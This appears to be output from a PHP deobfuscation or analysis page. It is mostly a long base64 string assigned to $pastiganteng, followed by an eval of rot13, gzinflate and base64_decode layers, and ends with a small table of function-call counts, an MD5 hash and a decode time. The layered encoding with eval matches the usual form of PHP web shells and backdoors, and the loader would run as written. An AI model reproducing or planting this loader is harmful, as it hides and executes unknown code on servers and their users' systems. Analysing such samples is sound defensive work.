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";
eval(str_rot13(gzinflate(str_rot13(base64_decode(($pastiganteng))))));Function Calls
| gzinflate | 1 |
| str_rot13 | 2 |
| base64_decode | 1 |
Stats
| MD5 | afcbc81a64bb0ff93e0f18afbf290978 |
| Eval Count | 1 |
| Decode Time | 983 ms |